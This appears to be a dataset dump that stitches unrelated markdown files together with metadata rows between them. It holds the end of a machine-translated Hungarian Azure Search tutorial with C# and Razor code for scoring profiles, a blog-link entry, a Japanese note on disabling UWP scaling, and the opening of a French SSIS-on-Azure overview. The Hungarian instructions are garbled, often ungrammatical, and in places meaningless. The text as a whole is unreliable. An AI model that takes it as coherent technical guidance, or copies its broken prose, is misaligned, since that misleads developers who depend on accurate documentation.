2. A következő relevanciaprofil jelentősen, felgyorsíthatók a pontszám, ha egy megadott paraméter tartalmaz egy vagy több (amely hívjuk "eszközök"), a címkék listájában. A profil a lényeg, hogy a paraméter _kell_ adni, szöveget tartalmazó. Ha a paraméter üres, vagy nincs megadva, a rendszer hibajelzést hiba.
```cs
{
"name": "boostAmenities",
"functions": [
{
"type": "tag",
"fieldName": "Tags",
"boost": 5,
"tag": {
"tagsParameter": "amenities"
}
}
]
}
```
3. A fenti harmadik példában a minősítés egy jelentős boost biztosít a pontszámot. A legutóbbi felújított dátuma a mai dátumtól is a pontszám, de csak ha az adatok körébe 730 napig (2 év) jelentősen növelheti.
```cs
{
"name": "renovatedAndHighlyRated",
"functions": [
{
"type": "magnitude",
"fieldName": "Rating",
"boost": 20,
"interpolation": "linear",
"magnitude": {
"boostingRangeStart": 0,
"boostingRangeEnd": 5,
"constantBoostBeyondRange": false
}
},
{
"type": "freshness",
"fieldName": "LastRenovationDate",
"boost": 10,
"interpolation": "quadratic",
"freshness": {
"boostingDuration": "P730D"
}
}
]
}
```
Most ossza meg velünk működnek az Ha ezeket a profilokat, látjuk, hogy azok kell!
### <a name="add-code-to-the-view-to-compare-profiles"></a>Adja hozzá a kódot a nézetet, hogy a profilok összehasonlítása
1. Nyissa meg az index.cshtml fájl, és cserélje le a <törzs> szakaszban a következő kóddal.
```cs
<body>
@using (Html.BeginForm("Index", "Home", FormMethod.Post))
{
<table>
<tr>
<td></td>
<td>
<h1 class="sampleTitle">
<img src="~/images/azure-logo.png" width="80" />
Hotels Search - Order Results
</h1>
</td>
</tr>
<tr>
<td></td>
<td>
<!-- Display the search text box, with the search icon to the right of it. -->
<div class="searchBoxForm">
@Html.TextBoxFor(m => m.searchText, new { @class = "searchBox" }) <input class="searchBoxSubmit" type="submit" value="">
</div>
<div class="searchBoxForm">
<b> Order: </b>
@Html.RadioButtonFor(m => m.scoring, "Default") Default
@Html.RadioButtonFor(m => m.scoring, "RatingRenovation") By numerical Rating
@Html.RadioButtonFor(m => m.scoring, "boostAmenities") By Amenities
@Html.RadioButtonFor(m => m.scoring, "renovatedAndHighlyRated") By Renovated date/Rating profile
</div>
</td>
</tr>
<tr>
<td valign="top">
<div id="facetplace" class="facetchecks">
@if (Model != null && Model.facetText != null)
{
<h5 class="facetheader">Amenities:</h5>
<ul class="facetlist">
@for (var c = 0; c < Model.facetText.Length; c++)
{
<li> @Html.CheckBoxFor(m => m.facetOn[c], new { @id = "check" + c.ToString() }) @Model.facetText[c] </li>
}
</ul>
}
</div>
</td>
<td>
@if (Model != null && Model.resultList != null)
{
// Show the total result count.
<p class="sampleText">
@Html.DisplayFor(m => m.resultList.Count) Results <br />
</p>
<div id="myDiv" style="width: 800px; height: 450px; overflow-y: scroll;" onscroll="scrolled()">
<!-- Show the hotel data. -->
@for (var i = 0; i < Model.resultList.Results.Count; i++)
{
var rateText = $"Rates from ${Model.resultList.Results[i].Document.cheapest} to ${Model.resultList.Results[i].Document.expensive}";
var lastRenovatedText = $"Last renovated: { Model.resultList.Results[i].Document.LastRenovationDate.Value.Year}";
var ratingText = $"Rating: {Model.resultList.Results[i].Document.Rating}";
string amenities = string.Join(", ", Model.resultList.Results[i].Document.Tags);
string fullDescription = Model.resultList.Results[i].Document.Description;
fullDescription += $"\nAmenities: {amenities}";
// Display the hotel details.
@Html.TextArea($"name{i}", Model.resultList.Results[i].Document.HotelName, new { @class = "box1A" })
@Html.TextArea($"rating{i}", ratingText, new { @class = "box1B" })
@Html.TextArea($"rates{i}", rateText, new { @class = "box2A" })
@Html.TextArea($"renovation{i}", lastRenovatedText, new { @class = "box2B" })
@Html.TextArea($"desc{i}", fullDescription, new { @class = "box3" })
}
</div>
<script>
function scrolled() {
if (myDiv.offsetHeight + myDiv.scrollTop >= myDiv.scrollHeight) {
$.getJSON("/Home/Next", function (data) {
var div = document.getElementById('myDiv');
// Append the returned data to the current list of hotels.
for (var i = 0; i < data.length; i += 5) {
div.innerHTML += '\n<textarea class="box1A">' + data[i] + '</textarea>';
div.innerHTML += '<textarea class="box1B">' + data[i + 1] + '</textarea>';
div.innerHTML += '\n<textarea class="box2A">' + data[i + 2] + '</textarea>';
div.innerHTML += '<textarea class="box2B">' + data[i + 3] + '</textarea>';
div.innerHTML += '\n<textarea class="box3">' + data[i + 4] + '</textarea>';
}
});
}
}
</script>
}
</td>
</tr>
</table>
}
</body>
```
2. Nyissa meg a SearchData.cs fájlt, és cserélje le a **SearchData** osztályban az alábbi kódra.
```cs
public class SearchData
{
public SearchData()
{
}
// Constructor to initialize the list of facets sent from the controller.
public SearchData(List<string> facets)
{
facetText = new string[facets.Count];
for (int i = 0; i < facets.Count; i++)
{
facetText[i] = facets[i];
}
}
// Array to hold the text for each amenity.
public string[] facetText { get; set; }
// Array to hold the setting for each amenitity.
public bool[] facetOn { get; set; }
// The text to search for.
public string searchText { get; set; }
// Record if the next page is requested.
public string paging { get; set; }
// The list of results.
public DocumentSearchResult<Hotel> resultList;
public string scoring { get; set; }
}
```
3. Nyissa meg a hotels.css fájlt, és adja hozzá a következő HTML-osztályokat.
```html
.facetlist {
list-style: none;
}
.facetchecks {
width: 250px;
display: normal;
color: #666;
margin: 10px;
padding: 5px;
}
.facetheader {
font-size: 10pt;
font-weight: bold;
color: darkgreen;
}
```
### <a name="add-code-to-the-controller-to-specify-a-scoring-profile"></a>Kódot hozzáadnia a tartományvezérlőt a adja meg a relevanciaprofil
1. Nyissa meg az otthoni vezérlő fájlt. Adja hozzá a következő **használatával** utasítással (támogatási a listák létrehozása).
```cs
using System.Linq;
```
2. Ebben a példában a kezdeti hívást kell **Index** térni egy kicsit több, mint a kezdő nézete. A metódus a nézetben megjelenítendő legfeljebb 20 eszközök most már keres.
```cs
public async Task<ActionResult> Index()
{
InitSearch();
// Set up the facets call in the search parameters.
SearchParameters sp = new SearchParameters()
{
// Search for up to 20 amenities.
Facets = new List<string> { "Tags,count:20" },
};
DocumentSearchResult<Hotel> searchResult = await _indexClient.Documents.SearchAsync<Hotel>("*", sp);
// Convert the results to a list that can be displayed in the client.
List<string> facets = searchResult.Facets["Tags"].Select(x => x.Value.ToString()).ToList();
// Initiate a model with a list of facets for the first view.
SearchData model = new SearchData(facets);
// Save the facet text for the next view.
SaveFacets(model, false);
// Render the view including the facets.
return View(model);
}
```
3. Két privát módszerek aspektusait menteni egy ideiglenes tárolóra, és helyreállítja őket az ideiglenes storage-ból, és töltse fel a modell van szükségünk.
```cs
// Save the facet text to temporary storage, optionally saving the state of the check boxes.
private void SaveFacets(SearchData model, bool saveChecks = false)
{
for (int i = 0; i < model.facetText.Length; i++)
{
TempData["facet" + i.ToString()] = model.facetText[i];
if (saveChecks)
{
TempData["faceton" + i.ToString()] = model.facetOn[i];
}
}
TempData["facetcount"] = model.facetText.Length;
}
// Recover the facet text to a model, optionally recoving the state of the check boxes.
private void RecoverFacets(SearchData model, bool recoverChecks = false)
{
// Create arrays of the appropriate length.
model.facetText = new string[(int)TempData["facetcount"]];
if (recoverChecks)
{
model.facetOn = new bool[(int)TempData["facetcount"]];
}
for (int i = 0; i < (int)TempData["facetcount"]; i++)
{
model.facetText[i] = TempData["facet" + i.ToString()].ToString();
if (recoverChecks)
{
model.facetOn[i] = (bool)TempData["faceton" + i.ToString()];
}
}
}
```
4. Be kell a **OrderBy** és **ScoringProfile** paramétereket szükség szerint. Cserélje le a meglévő **Index (SearchData modell)** , a következő metódust.
```cs
public async Task<ActionResult> Index(SearchData model)
{
try
{
InitSearch();
int page;
if (model.paging != null && model.paging == "next")
{
// Recover the facet text, and the facet check box settings.
RecoverFacets(model, true);
// Increment the page.
page = (int)TempData["page"] + 1;
// Recover the search text.
model.searchText = TempData["searchfor"].ToString();
}
else
{
// First search with text.
// Recover the facet text, but ignore the check box settings, and use the current model settings.
RecoverFacets(model,false);
// First call. Check for valid text input, and valid scoring profile.
if (model.searchText == null)
{
model.searchText = "";
}
if (model.scoring == null)
{
model.scoring = "Default";
}
page = 0;
}
// Set empty defaults for ordering and scoring parameters.
var orderby = new List<string>();
string profile = "";
var scoringParams = new List<ScoringParameter>();
// Set the ordering based on the user's radio button selection.
switch (model.scoring)
{
case "RatingRenovation":
orderby.Add("Rating desc");
orderby.Add("LastRenovationDate desc");
break;
case "boostAmenities":
{
profile = model.scoring;
var setAmenities = new List<string>();
// Create a string list of amenities that have been clicked.
for (int a = 0; a < model.facetOn.Length; a++)
{
if (model.facetOn[a])
{
setAmenities.Add(model.facetText[a]);
}
}
if (setAmenities.Count > 0)
{
// Only set scoring parameters if there are any.
var sp = new ScoringParameter("amenities", setAmenities);
scoringParams.Add(sp);
}
else
{
// No amenities selected, so set profile back to default.
profile = "";
}
}
break;
case "renovatedAndHighlyRated":
profile = model.scoring;
break;
default:
break;
}
// Setup the search parameters.
var parameters = new SearchParameters
{
// Set the ordering/scoring parameters.
OrderBy = orderby,
ScoringProfile = profile,
ScoringParameters = scoringParams,
// Select the data properties to be returned.
Select = new[] { "HotelName", "Description", "Tags", "Rooms", "Rating", "LastRenovationDate" },
SearchMode = SearchMode.All,
// Skip past results that have already been returned.
Skip = page * GlobalVariables.ResultsPerPage,
// Take only the next page worth of results.
Top = GlobalVariables.ResultsPerPage,
// Include the total number of results.
IncludeTotalResultCount = true,
};
// For efficiency, the search call should be asynchronous, so use SearchAsync rather than Search.
model.resultList = await _indexClient.Documents.SearchAsync<Hotel>(model.searchText, parameters);
// Ensure TempData is stored for the next call.
TempData["page"] = page;
TempData["searchfor"] = model.searchText;
TempData["scoring"] = model.scoring;
SaveFacets(model,true);
// Calculate the room rate ranges.
for (int n = 0; n < model.resultList.Results.Count; n++)
{
var cheapest = 0d;
var expensive = 0d;
for (var r = 0; r < model.resultList.Results[n].Document.Rooms.Length; r++)
{
var rate = model.resultList.Results[n].Document.Rooms[r].BaseRate;
if (rate < cheapest || cheapest == 0)
{
cheapest = (double)rate;
}
if (rate > expensive)
{
expensive = (double)rate;
}
}
model.resultList.Results[n].Document.cheapest = cheapest;
model.resultList.Results[n].Document.expensive = expensive;
}
}
catch
{
return View("Error", new ErrorViewModel { RequestId = "1" });
}
return View("Index", model);
}
```
Olvassa el a hozzászólások minden a **váltson** beállításokat.
5. Azt nem kell módosításokat végezni a **tovább** műveletet, ha végrehajtotta a rendezés több tulajdonság alapján az előző szakaszban további kódját.
### <a name="run-and-test-the-app"></a>Futtassa, és az alkalmazás tesztelése
1. Futtassa az alkalmazást. A nézet az eszközök teljes körű kell megjelennie.
2. Rendezéshez, "által numerikus minősítés" kiválasztásával felkínálja a numerikus rendezése már létrehozott ebben az oktatóanyagban az egyenlő értékelés hotels kiválasztani felújítás dátummal.

3. Próbálja meg a "által eszközök" profil. Adja meg az eszközök különböző beállításokat, és győződjön meg arról, hogy ezek az eszközök a szállodák fel az eredmények listájában vannak támogatni.

4. Próbálja ki a "Szerint Renovated dátum/minősítés profil" Ha kap várt megtekintéséhez. Egyetlen nemrégiben felújított hotels kell kapnia egy _frissessége_ boost.
### <a name="resources"></a>További források
További információkért tekintse meg a következő [relevanciaprofil hozzáadása az Azure Search-index](https://docs.microsoft.com/azure/search/index-add-scoring-profiles).
## <a name="takeaways"></a>Legfontosabb ismeretek
Vegye figyelembe a következő takeaways a projekt:
* Keresési eredmények kell rendelni, leginkább releváns először elvárják lesz.
* Így a rendezés igények kielégítéséhez strukturált adatok sem ördöngösség. Nem sikerült szerinti rendezéshez a "legolcsóbb" egyszerűen, mivel az adatok nem strukturált az elvégezni kívánt további kód nélkül rendezés engedélyezése.
* Rendezés, az eredmények, amelyek ugyanazzal az értékkel rendelkeznek a magasabb szintű érzetét megkülönböztetéséhez a sok szintje lehet.
* Természetes, az egyes eredmények növekvő sorrendben (pl.: egy pont távolságra), és néhány a csökkenő sorrendben kell rendezni (pl.: Vendég a minősítés).
* Pontozási profilok is lehet meghatározni, ha a numerikus összehasonlításban nem érhetők el, vagy nem elég, intelligens az adatkészlet. Minden eredmény pontozási sorrend Súgó és intelligensen az eredmények megjelenítéséhez.
## <a name="next-steps"></a>További lépések
Befejezte a sorozatát C# oktatóanyagokat – meg kell révén az Azure Search API-k értékes ismerete.
A további hivatkozás és oktatóanyagok, fontolja meg a böngészés [Microsoft Learn](https://docs.microsoft.com/learn/browse/?products=azure), vagy a többi oktatóanyag a [Azure Search-dokumentáció](https://docs.microsoft.com/azure/search/).
| 48.696008 | 736 | 0.580755 | hun_Latn | 0.999308 |
9786a21ddb10c4b1eb577e1d40aa1663e6e069d2 | 546 | md | Markdown | content/links/2022-02-22-20-45-leaders-show-their-work.md | ys/brain | 8e6c696dfef5eaa2cbce781c70547a1ade493a36 | [
"MIT"
] | null | null | null | content/links/2022-02-22-20-45-leaders-show-their-work.md | ys/brain | 8e6c696dfef5eaa2cbce781c70547a1ade493a36 | [
"MIT"
] | null | null | null | content/links/2022-02-22-20-45-leaders-show-their-work.md | ys/brain | 8e6c696dfef5eaa2cbce781c70547a1ade493a36 | [
"MIT"
] | null | null | null | ---
uuid: a70cf4aa-3c94-49b3-a198-55c03d7cd74c
link: https://ben.balter.com/2022/02/16/leaders-show-their-work/
category: article
headImage:
title: Leaders show their work
description: Absent working within systems that naturally capture and expose process,
transparency takes effort. Leaders should hold one another accountable for spending
the additional cycles to show their work through communicating not only what decision
was made, but also how the decision was made, and why.
tags: []
date: 2022-02-22 20:45:53.022063195 +00:00
---
| 39 | 87 | 0.783883 | eng_Latn | 0.998352 |
9786eb112e43cd11057217feaae784d2a6374b64 | 1,426 | md | Markdown | windows-apps-src/xbox-apps/disable-scaling.md | yoichinak/windows-uwp.ja-jp | 51502bb8eb5019c8da251091681058319ef2cc96 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | windows-apps-src/xbox-apps/disable-scaling.md | yoichinak/windows-uwp.ja-jp | 51502bb8eb5019c8da251091681058319ef2cc96 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | windows-apps-src/xbox-apps/disable-scaling.md | yoichinak/windows-uwp.ja-jp | 51502bb8eb5019c8da251091681058319ef2cc96 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: スケーリングを無効にする方法
description: 既定のスケールファクターをオフにして、アプリケーションで実際の 1910 x 1080 ピクセルデバイスディメンションを使用する方法について説明します。
ms.date: 02/08/2017
ms.topic: article
keywords: windows 10, uwp
ms.assetid: 6e68c1fc-a407-4c0b-b0f4-e445ccb72ff3
ms.localizationpriority: medium
ms.openlocfilehash: 404bdd9a4b25254c1941928dbfb0b548492f03a5
ms.sourcegitcommit: 7b2febddb3e8a17c9ab158abcdd2a59ce126661c
ms.translationtype: MT
ms.contentlocale: ja-JP
ms.lasthandoff: 08/31/2020
ms.locfileid: "89174706"
---
# <a name="how-to-turn-off-scaling"></a>スケーリングを無効にする方法
アプリケーションは既定で、XAML アプリの場合は 200% に、HTML アプリの場合は 150% に拡大されます。 また、既定の倍率を無効にすることもできます。 これにより、アプリケーションをデバイスの実際のピクセル サイズ (1910 x 1080 ピクセル) で使うことができるようになります。
## <a name="html"></a>HTML
次のコード スニペットを使って拡大縮小率を無効にすることができます。
```
var result = Windows.UI.ViewManagement.ApplicationViewScaling.trySetDisableLayoutScaling(true);
```
また、Web 対応の次の方法を使うこともできます。
```
@media (max-height: 1080px) {
@-ms-viewport {
height: 1080px;
}
}
```
## <a name="xaml"></a>XAML
次のコード スニペットを使って拡大縮小率を無効にすることができます。
```
bool result = Windows.UI.ViewManagement.ApplicationViewScaling.TrySetDisableLayoutScaling(true);
```
## <a name="directxc"></a>DirectX/C++
DirectX/C++ アプリケーションはスケーリングされません。 自動スケーリングは、HTML アプリケーションと XAML アプリケーションにのみ適用されます。
## <a name="see-also"></a>関連項目
- [Xbox のベスト プラクティス](tailoring-for-xbox.md)
- [Xbox One の UWP](index.md)
| 29.102041 | 154 | 0.742637 | yue_Hant | 0.564303 |
9787ece5ad822762b4639967546fa98e1e8f9193 | 3,102 | md | Markdown | _posts/2021-9-15-If-You-Weren't.md | markzxu/hacker-blog | dc80f7bbe79bb5b99c8ef6f9931cfc98818d7d02 | [
"CC0-1.0"
] | 2 | 2020-12-15T22:21:31.000Z | 2021-08-09T23:12:05.000Z | _posts/2021-9-15-If-You-Weren't.md | markzxu/hacker-blog | dc80f7bbe79bb5b99c8ef6f9931cfc98818d7d02 | [
"CC0-1.0"
] | null | null | null | _posts/2021-9-15-If-You-Weren't.md | markzxu/hacker-blog | dc80f7bbe79bb5b99c8ef6f9931cfc98818d7d02 | [
"CC0-1.0"
] | 2 | 2022-02-27T04:42:33.000Z | 2022-02-27T04:47:13.000Z | ---
title: If you weren't such a idiot...
---
My friend Buck once told me that he often had interactions with me that felt like I was saying "If you weren't such a fucking idiot, you would obviously do..." Here's a list of such advice in that spirit.
Note that if you do/don't do these things, I'm *technically* calling you an idiot, but I do/don't do a bunch of them too. We can be idiots together.
If you weren't such a fucking idiot...
* You would have multiple copies of any object that would make you sad if you didn't have it
* Examples: ear plugs, melatonin, eye masks, hats, sun glasses, various foods, possibly computers, etc.
* You would spend money on goods and services.
* Examples of goods: faster computer, monitor, keyboard, various tasty foods, higher quality clothing, standing desk, decorations for your room, mattress, pillow, sheets, etc.
* Examples of services: uber, doordash, cleaners, personal assistants, editors, house managers, laundry, etc.
* You would have tried many things at least one time.
* Examples of things to do: climbing, singing, listening to music, playing instruments, dancing, eating various types of food, writing, parties.
* You wouldn't do anything absurdly dangerous, like take unknown drugs or ride a bike without a helmet.
* You wouldn't take irreversible actions if you didn't know what the fuck you were doing.
* You would exercise frequently.
* Types of exercise to try: climbing, walking, running, soccer, football, yoga, hiking, fencing, swimming, wrestling, beat saber, etc.
* You would reliably sleep 6-9 hours a night.
* Obvious things to try:
* melatonin
* blackout curtains
* putting black tape over LEDs on electronics
* experimenting with mattress, pillow, blankets, sheets, etc.
* blue light blocking glasses
* You would routinely look up key numbers and do numerical consistency checks during thinking.
* You would have a password manager.
* You would invest money in yourself.
* Recall: money can be used to buy goods and services.
* You would use a email's subject line to succinctly describe what you want from the person.
* For example, if I want to meet with my advisor, I'll send an email with the subject "Request for Advisory Meeting" or something similar. If I want someone to read a draft of something I wrote, the subject would be "Request for Feedback on \<Title\>".
* You would have a good mentor.
* One way to do this is to email people that you want to be your mentor with the subject "Request for Mentorship".
* You would drink lots of water.
* You would take notes in a searchable database.
* You would summarize things that you read.
* You would have tried making your room as bright as the outdoors.
* You would carry batteries to recharge your phone.
* You would have tried using pens with multiple colors.
* You would read textbooks instead of popular introductions.
* You would put a relatively consistent dollar value on your time.
I'm sure there are more things that I tell people that can be prefaced with "if you weren't such an idiot...", but that's all I got for now. | 67.434783 | 254 | 0.755964 | eng_Latn | 0.999599 |
978a89398c4d6d258d38215599cbbdc786c28463 | 404 | md | Markdown | io/dict/data/grey/README.md | gnames/gnfinder | e80e20c0b79c036d6529646d2189aa20b657b0d5 | [
"MIT"
] | 27 | 2017-11-28T19:57:34.000Z | 2022-01-07T01:10:34.000Z | io/dict/data/grey/README.md | gnames/gnfinder | e80e20c0b79c036d6529646d2189aa20b657b0d5 | [
"MIT"
] | 148 | 2017-10-26T10:11:57.000Z | 2022-03-18T16:03:56.000Z | io/dict/data/grey/README.md | gnames/gnfinder | e80e20c0b79c036d6529646d2189aa20b657b0d5 | [
"MIT"
] | 5 | 2017-11-24T23:59:39.000Z | 2021-03-11T15:07:39.000Z | "Grey" dictionaries
-------------------
`genera.txt`
Contains ambiguous genera and their species. The idea is to use them together
so if there is a known species with ambiguous genera -- we assume it is a real
name
`species.txt`
List of all ambiguous species names. We would assume they are real species if
they appear together with known genus
`uninomials.txt`
List of 3 ambiguous uninomial names
| 22.444444 | 78 | 0.74505 | eng_Latn | 0.999783 |
978b08192535ea18f507d02e46d9825d43448dc9 | 1,015 | md | Markdown | questions/Algorithms/0168. Excel Sheet Column Title/README.md | 6leetcode/6leetcode | b1fac95238a55a36f08531af5e04485d0cd21006 | [
"MIT"
] | 9 | 2019-08-15T05:09:40.000Z | 2021-05-01T09:26:59.000Z | questions/Algorithms/0168. Excel Sheet Column Title/README.md | 6leetcode/6leetcode | b1fac95238a55a36f08531af5e04485d0cd21006 | [
"MIT"
] | 135 | 2019-09-26T03:40:11.000Z | 2022-02-02T04:15:39.000Z | questions/Algorithms/0168. Excel Sheet Column Title/README.md | 6leetcode/6leetcode | b1fac95238a55a36f08531af5e04485d0cd21006 | [
"MIT"
] | 1 | 2022-01-05T01:43:17.000Z | 2022-01-05T01:43:17.000Z | ### [Excel Sheet Column Title](https://leetcode.com/problems/excel-sheet-column-title)
<p>Given an integer <code>columnNumber</code>, return <em>its corresponding column title as it appears in an Excel sheet</em>.</p>
<p>For example:</p>
<pre>
A -> 1
B -> 2
C -> 3
...
Z -> 26
AA -> 27
AB -> 28
...
</pre>
<p> </p>
<p><strong>Example 1:</strong></p>
<pre>
<strong>Input:</strong> columnNumber = 1
<strong>Output:</strong> "A"
</pre>
<p><strong>Example 2:</strong></p>
<pre>
<strong>Input:</strong> columnNumber = 28
<strong>Output:</strong> "AB"
</pre>
<p><strong>Example 3:</strong></p>
<pre>
<strong>Input:</strong> columnNumber = 701
<strong>Output:</strong> "ZY"
</pre>
<p><strong>Example 4:</strong></p>
<pre>
<strong>Input:</strong> columnNumber = 2147483647
<strong>Output:</strong> "FXSHRXW"
</pre>
<p> </p>
<p><strong>Constraints:</strong></p>
<ul>
<li><code>1 <= columnNumber <= 2<sup>31</sup> - 1</code></li>
</ul>
| 19.150943 | 130 | 0.641379 | eng_Latn | 0.181133 |
978b3b9a4e8b8faa2702bb955c054906cfdb60fd | 13,969 | md | Markdown | docs/integration-services/lift-shift/ssis-azure-lift-shift-ssis-packages-overview.md | zelanko/sql-docs.fr-fr | 27bf5ccdbf98932e6c384c58b7fecf37fc525190 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/integration-services/lift-shift/ssis-azure-lift-shift-ssis-packages-overview.md | zelanko/sql-docs.fr-fr | 27bf5ccdbf98932e6c384c58b7fecf37fc525190 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/integration-services/lift-shift/ssis-azure-lift-shift-ssis-packages-overview.md | zelanko/sql-docs.fr-fr | 27bf5ccdbf98932e6c384c58b7fecf37fc525190 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Déployer et exécuter des packages SSIS dans Azure | Microsoft Docs
description: Découvrez comment vous pouvez déplacer vos projets, packages et charges de travail SQL Server Integration Services (SSIS) vers le cloud Microsoft Azure.
ms.date: 09/23/2018
ms.topic: conceptual
ms.prod: sql
ms.prod_service: integration-services
ms.custom: ''
ms.technology: integration-services
author: swinarko
ms.author: sawinark
ms.reviewer: maghan
ms.openlocfilehash: 7a962b29d6af2caf48f32eec5bc7e77bef3b126f
ms.sourcegitcommit: cfa04a73b26312bf18d8f6296891679166e2754d
ms.translationtype: HT
ms.contentlocale: fr-FR
ms.lasthandoff: 10/19/2020
ms.locfileid: "92194044"
---
# <a name="lift-and-shift-sql-server-integration-services-workloads-to-the-cloud"></a>Effectuer un « lift-and-shift » des charges de travail SQL Server Integration Services vers le cloud
[!INCLUDE[sqlserver-ssis](../../includes/applies-to-version/sqlserver-ssis.md)]
Vous pouvez maintenant déplacer vos projets, packages et charges de travail SQL Server Integration Services (SSIS) vers le cloud Azure. Déployez, exécutez et gérez des projets et des packages SSIS dans le catalogue SSIS (SSISDB) dans Azure SQL Database ou SQL Managed Instance avec des outils habituels, comme SQL Server Management Studio (SSMS).
## <a name="benefits"></a>Avantages
Le déplacement de vos charges de travail SSIS locales vers Azure présente les avantages potentiels suivants :
- **Réduisez les coûts opérationnels** et la charge de gestion de l’infrastructure quand vous exécutez SSIS localement ou sur des machines virtuelles Azure.
- **Augmentez la haute disponibilité** pour pouvoir spécifier plusieurs nœuds par cluster, et étendez les fonctionnalités de haute disponibilité d’Azure et d’Azure SQL Database.
- **Augmentez la scalabilité** pour pouvoir spécifier plusieurs cœurs par nœud (scale-up) et plusieurs nœuds par cluster (scale-out).
## <a name="architecture-of-ssis-on-azure"></a>Architecture de SSIS sur Azure
Le tableau suivant met en évidence les différences entre une instance SSIS locale et une instance SSIS sur Azure.
La différence la plus importante est la séparation du stockage et de l’exécution. Azure Data Factory héberge le moteur de runtime des packages SSIS sur Azure. Le moteur d’exécution est appelé Azure-SSIS Integration Runtime (Azure-SSIS IR). Pour plus d’informations, consultez [Azure-SSIS Runtime Integration](/azure/data-factory/concepts-integration-runtime#azure-ssis-integration-runtime).
| Emplacement | Stockage | Runtime | Extensibilité |
|---|---|---|---|
| Localement | SQL Server | Runtime SSIS hébergé par SQL Server | SSIS Scale Out (dans SQL Server 2017 et versions ultérieures)<br/><br/>Solutions personnalisées (dans les versions antérieures de SQL Server) |
| Sur Azure | SQL Database ou SQL Managed Instance | Azure-SSIS Integration Runtime, composant d’Azure Data Factory | Options de mise à l’échelle pour Azure-SSIS Integration Runtime |
| | | | |
## <a name="provision-ssis-on-azure"></a>Provisionner SSIS sur Azure
**Provisionnez**. Avant de pouvoir déployer et exécuter des packages SSIS dans Azure, vous devez provisionner le catalogue SSIS (SSISDB) et le runtime d’intégration Azure-SSIS.
- Pour configurer SSIS sur Azure dans le portail Azure, suivez les étapes de configuration dans cet article : [Configurer Azure-SSIS Integration Runtime dans Azure Data Factory](/azure/data-factory/tutorial-deploy-ssis-packages-azure).
- Pour configurer SSIS sur Azure avec PowerShell, suivez les étapes de configuration dans cet article : [Configurer Azure-SSIS Integration Runtime dans Azure Data Factory avec PowerShell](/azure/data-factory/tutorial-deploy-ssis-packages-azure-powershell).
Il vous suffit de provisionner Azure-SSIS IR une seule fois. Vous pouvez ensuite utiliser des outils familiers tels que SQL Server Data Tools (SSDT) et SQL Server Management Studio (SSMS) pour déployer, configurer, exécuter, surveiller, planifier et gérer les packages.
> [!NOTE]
> Azure-SSIS Integration Runtime n’est pas encore disponible dans toutes les régions Azure. Pour plus d’informations sur les régions prises en charge, consultez [Produits disponibles par région - Microsoft Azure](https://azure.microsoft.com/regions/services/).
**Effectuez une augmentation de la taille des instances et une montée en puissance parallèle**. Quand vous provisionnez Azure-SSIS IR, vous pouvez effectuer un scale-up et un scale-out en spécifiant des valeurs pour les options suivantes :
- la taille du nœud (notamment le nombre de cœurs) et le nombre de nœuds du cluster ;
- l’instance existante d’Azure SQL Database pour héberger la base de données de catalogues SSIS (SSISDB), et le niveau de service de la base de données ;
- le nombre maximal d’exécutions parallèles par nœud.
**Améliorez les performances**. Pour plus d’informations, consultez [Configurer le runtime d’intégration Azure-SSIS pour de hautes performances](/azure/data-factory/configure-azure-ssis-integration-runtime-performance).
**Réduisez les coûts**. Pour réduire les coûts, exécutez Azure-SSIS IR uniquement lorsque vous en avez besoin. Pour plus d’informations, voir [Guide pratique pour planifier le démarrage et l’arrêt d’un runtime d’intégration Azure-SSIS](/azure/data-factory/how-to-schedule-azure-ssis-integration-runtime).
## <a name="design-packages"></a>Concevoir des packages
Vous continuez à **concevoir et générer des packages** localement dans SSDT, ou dans Visual Studio avec SSDT installé.
### <a name="connect-to-data-sources"></a>Se connecter aux sources de données
Pour se connecter à des sources de données locales à partir du cloud avec **l’authentification Windows**, voir [Se connecter à des sources de données et à des partages de fichiers avec l’authentification Windows à partir de packages SSIS sur Azure](/azure/data-factory/ssis-azure-connect-with-windows-auth).
Pour se connecter à des fichiers et à des partages de fichiers, voir [Ouvrir et enregistrer des fichiers localement et sur Azure avec des packages SSIS déployés sur Azure](/azure/data-factory/ssis-azure-files-file-shares).
### <a name="available-ssis-components"></a>Composants SSIS disponibles
Si vous approvisionnez une instance de SQL Database pour héberger SSISDB, les composants Azure Feature Pack pour SSIS et Access Redistributable sont également installés. Ces composants fournissent une connectivité à diverses sources de données **Azure** et aux fichiers **Excel et Access**, en plus des sources de données prises en charge par les composants intégrés.
Vous pouvez également installer des composants supplémentaires. Par exemple, vous pouvez installer un pilote qui n’est pas installé par défaut. Pour plus d’informations, voir [Personnaliser l’installation du runtime d’intégration Azure-SSIS](/azure/data-factory/how-to-configure-azure-ssis-ir-custom-setup).
Des composants supplémentaires sont accessibles aux détenteurs d’une licence Enterprise Edition. Pour plus d’informations, voir [Configurer Enterprise Edition pour Azure-SSIS Integration Runtime](/azure/data-factory/how-to-configure-azure-ssis-ir-enterprise-edition).
Si vous êtes éditeur de logiciels, vous pouvez mettre à jour l’installation de vos composants sous licence pour les rendre disponibles sur Azure. Pour plus d’informations, voir [Installer des composants personnalisés payants ou sous licence pour le runtime d’intégration Azure-SSIS](/azure/data-factory/how-to-develop-azure-ssis-ir-licensed-components).
### <a name="transaction-support"></a>Prise en charge des transactions
Avec SQL Server en local et sur des machines virtuelles Azure, vous pouvez utiliser des transactions Microsoft Distributed Transaction Coordinator (MSDTC). Pour configurer MSDTC sur chaque nœud d’Azure-SSIS IR, utilisez la fonctionnalité d’installation personnalisée. Pour plus d’informations, consultez [Custom setup for the Azure-SSIS integration runtime](/azure/data-factory/how-to-configure-azure-ssis-ir-custom-setup) (Configuration personnalisée du runtime d’intégration Azure-SSIS).
Avec Azure SQL Database, vous pouvez utiliser uniquement des transactions élastiques. Pour plus d’informations, consultez [Transactions distribuées entre bases de données cloud](/azure/sql-database/sql-database-elastic-transactions-overview).
## <a name="deploy-and-run-packages"></a>Déployer et exécuter des packages
Pour commencer, consultez [Tutoriel : Déployer et exécuter un package SQL Server Integration Services (SSIS) sur Azure](ssis-azure-deploy-run-monitor-tutorial.md).
### <a name="prerequisites"></a>Prérequis
Pour déployer des packages SSIS sur Azure, vous devez avoir l’une des versions suivantes de SQL Server Data Tools (SSDT) :
- Pour Visual Studio 2017, version 15.3 ou ultérieure.
